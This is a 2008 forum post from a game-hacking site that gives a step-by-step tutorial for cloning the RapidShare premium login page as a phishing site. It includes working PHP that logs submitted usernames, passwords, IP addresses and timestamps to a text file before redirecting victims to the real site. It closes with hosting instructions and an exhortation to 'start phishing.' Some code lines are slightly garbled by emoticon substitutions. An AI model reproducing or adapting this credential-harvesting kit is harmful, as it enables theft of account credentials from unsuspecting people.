Penrd Combat Arms Glitches/Hacks
Would you like to react to this message? Create an account in a few clicks or log in to continue.
Penrd Combat Arms Glitches/Hacks

Only Combat Arms
 
HomeHome  PortalPortal  GalleryGallery  Latest imagesLatest images  SearchSearch  RegisterRegister  Log in  

 

 How to make a basic prisher

Go down 
AuthorMessage
Penrd
Admin
Penrd


Number of posts : 42
Humor : Sleepy
Registration date : 2008-09-17

How to make a basic prisher Empty
PostSubject: How to make a basic prisher   How to make a basic prisher Icon_minitimeSat Sep 20, 2008 12:30 pm

Not by me


This is a step by step tutorial on how to make a phishing page to get account information for various websites from many people. This is only how to make the page, but it is up to you to decide how you are going to get people to fall for it.

this part of youre post is hidden

1. For this tut, we will use rapidshare.com as our page that we would like to make a phisher of.

2. Go to http://www.rapidshare.com and navigate to the premium account log-in screen at the url : https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi

3. We will now begin to make our phisher. Start by right clicking on the page and click view source.

4. Select all and paste into a notepad document.

5. You should see a bunch of random html coding, but we are only interested in two words: method and action.

6. Do a search in the document for the word "method" (without quotes).

7. Your result should be something like : method="post"

8. Change the word post to the word get.

9. Now do a search for the word "action" (without quotes). action is usually very close to method so you may not even have to do a search for it.

10. You should see something like this: action="https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"

11. Where the url in between the quotes is, replace the text with next.php so the new part says: action="next.php"

12. Save this file as index.html and create a new document on notepad.

13. In the new document, we will be making the next.php page, or the page that they are directed to after you have gotten their log-in information.

14. Copy and paste this code into the notepad document:
Code:

<?php
$datum = date('d-m-Y / H:i:s'wink;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: Put your REDIRECT URL Here"wink;
$handle = fopen("passez.txt", "a"wink;
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "="wink;
fwrite($handle, $value);
fwrite($handle, "\r\n"wink;
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n"wink;
fwrite($handle, "\r\n"wink;
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>




15. after the word location, where it says redirect url here, put in the original log-in screen url, or the url of the page that you want to send them after they type in their information. My next.php file looks like this:

Code:
<?php
$datum = date('d-m-Y / H:i:s'wink;
$ip = $_SERVER['REMOTE_ADDR'];
header("Location: https://ssl.rapidshare.com/cgi-bin/premiumzone.cgi"wink;
$handle = fopen("passez.txt", "a"wink;
foreach($_GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "="wink;
fwrite($handle, $value);
fwrite($handle, "\r\n"wink;
}
fwrite($handle, "IP: $ip | Date: $datum (Date=0 GTM)\r\n"wink;
fwrite($handle, "\r\n"wink;
fclose($handle);

setcookie ("user", "empty", time()+3600);
exit;
?>

16. Save this file as next.php and open up a new notepad document.

17. Save this document as passez.txt. The file that you need to save it as is in the next.php file right here:
$handle = fopen("passez.txt", "a"wink;
I chose passez.txt as my file where I want the passes to be stored, but you can change it to anything you want.

18. Go to a free web hosting client that supports php files, my personal favorite is freeweb7.com, and upload the 3 files, making sure to delete any files that were uploaded by the web host themselves, such as a sample index.html page.

19. Go check your url and type in test as the user and test as the pass and then navigate to your pass file and see if it shows up. If it shows up SUCCESS!!! It is time to start phishing.[b]
Back to top Go down
http://penrd-ca-forum.playogame.com
 
How to make a basic prisher
Back to top 
Page 1 of 1
 Similar topics
-
» Make a website same as the real one
» How to make the download speeds faster by 100kb~200kbsec
» singles in Melbourne free online dating - I want to make you hard

Permissions in this forum:You cannot reply to topics in this forum
Penrd Combat Arms Glitches/Hacks :: Other-
Jump to: